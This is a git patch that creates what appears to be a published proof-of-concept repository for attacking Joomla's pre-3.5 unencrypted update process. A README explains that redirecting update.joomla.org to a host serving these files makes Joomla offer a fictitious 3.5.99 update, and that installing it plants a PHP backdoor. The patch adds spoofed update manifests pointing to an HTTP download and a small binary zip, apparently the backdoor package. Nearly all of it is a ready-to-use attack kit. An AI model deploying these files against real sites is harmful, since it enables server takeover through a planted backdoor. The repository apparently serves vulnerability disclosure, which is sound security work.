From ab51d14a919ccb989ea45f68d6f32124c9340e40 Mon Sep 17 00:00:00 2001
From: Hanno <hanno@gentoo.org>
Date: Fri, 15 Jul 2016 19:34:19 +0200
Subject: [PATCH] initial commit

---
 README.md                                     |   8 +++
 ...a_3.5.x_to_3.5.99-Stable-Patch_Package.zip | Bin 0 -> 207 bytes
 core/extension_sts.xml                        |  60 ++++++++++++++++++
 core/list.xml                                 |   5 ++
 4 files changed, 73 insertions(+)
 create mode 100644 core/Joomla_3.5.x_to_3.5.99-Stable-Patch_Package.zip
 create mode 100644 core/extension_sts.xml
 create mode 100644 core/list.xml

diff --git a/README.md b/README.md
index 97f6b8e..040bc11 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,10 @@
 # joomla-nohttps-poc
 Proof of concept to install backdoor via unencrypted Joomla update
+
+# background
+
+The Joomla CMS before version 3.5 used an insecure update process over HTTP.
+
+This is a proof of concept. If you redirect requests to update.joomla.org to an
+HTTP host containing the files in this repo it will show an update to a fictious
+version 3.5.99. This 3.5.99 update will install a trivial PHP backdoor.
diff --git a/core/Joomla_3.5.x_to_3.5.99-Stable-Patch_Package.zip b/core/Joomla_3.5.x_to_3.5.99-Stable-Patch_Package.zip
new file mode 100644
index 0000000000000000000000000000000000000000..77af26816091ab2781361368bf406e088d5397c3
GIT binary patch
literal 207
zcmWIWW@h1H00Hf3Z63$h9eb__WP>mdgA7AbVsds$etwZ&K}JDn2qy!xpdD*C7Z8_L
za5FHnfV6=L8+)JvuGF%`91WFtch`_;rQ+1&qSTV){FGFsSWRoL0B=SnIc8iINq`Ju
iU<BeNjUX1PwX6_p(X0&cW@Q7ZWdy<?Ae|24FaQ7|q9>97

literal 0
HcmV?d00001

diff --git a/core/extension_sts.xml b/core/extension_sts.xml
new file mode 100644
index 0000000..33274ea
--- /dev/null
+++ b/core/extension_sts.xml
@@ -0,0 +1,60 @@
+<?xml version="1.0" ?>
+<updates>
+	<update>
+		<name>Joomla! 3.5</name>
+		<description>Joomla! 3.5 CMS</description>
+		<element>joomla</element>
+		<type>file</type>
+		<version>3.5.99</version>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+		<downloads>
+   			<downloadurl type="full" format="zip">https://github.com/joomla/joomla-cms/releases/download/3.5.99/Joomla_3.5.99-Stable-Update_Package.zip</downloadurl>
+		</downloads>
+		<tags>
+			<tag>stable</tag>
+		</tags>
+		<maintainer>Joomla! PLT</maintainer>
+		<maintainerurl>https://www.joomla.org</maintainerurl>
+		<section>STS</section>
+		<targetplatform name="joomla" version="3.3" />
+		<php_minimum>5.3.10</php_minimum>
+	</update>
+    <update>
+   		<name>Joomla! 3.5</name>
+   		<description>Joomla! 3.5 CMS</description>
+   		<element>joomla</element>
+   		<type>file</type>
+   		<version>3.5.99</version>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+   		<downloads>
+   			<downloadurl type="full" format="zip">https://github.com/joomla/joomla-cms/releases/download/3.5.99/Joomla_3.5.99-Stable-Update_Package.zip</downloadurl>
+   		</downloads>
+   		<tags>
+   			<tag>stable</tag>
+   		</tags>
+   		<maintainer>Joomla! PLT</maintainer>
+   		<maintainerurl>https://www.joomla.org</maintainerurl>
+   		<section>STS</section>
+   		<targetplatform name="joomla" version="3.4" />
+   		<php_minimum>5.3.10</php_minimum>
+   	</update>
+  	<update>
+   		<name>Joomla! 3.5</name>
+   		<description>Joomla! 3.5 CMS</description>
+   		<element>joomla</element>
+   		<type>file</type>
+		<infourl title="Joomla!">https://www.joomla.org/announcements/release-news/5655-joomla-3.5.99-released.html</infourl>
+   		<version>3.5.99</version>
+   		<downloads>
+   			<downloadurl type="full" format="zip">http://update.joomla.org/core/Joomla_3.5.x_to_3.5.99-Stable-Patch_Package.zip</downloadurl>
+   		</downloads>
+   		<tags>
+   			<tag>stable</tag>
+   		</tags>
+   		<maintainer>Joomla! PLT</maintainer>
+   		<maintainerurl>https://www.joomla.org</maintainerurl>
+   		<section>STS</section>
+   		<targetplatform name="joomla" version="3.5" />
+   		<php_minimum>5.3.10</php_minimum>
+   	</update>
+</updates>
diff --git a/core/list.xml b/core/list.xml
new file mode 100644
index 0000000..c4f7c29
--- /dev/null
+++ b/core/list.xml
@@ -0,0 +1,5 @@
+<extensionset name="Joomla Core" description="Joomla! Core">
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.3" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.4" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+	<extension name="Joomla" element="joomla" type="file" version="3.5.99" targetplatformversion="3.5" detailsurl="http://update.joomla.org/core/extension_sts.xml" />
+</extensionset>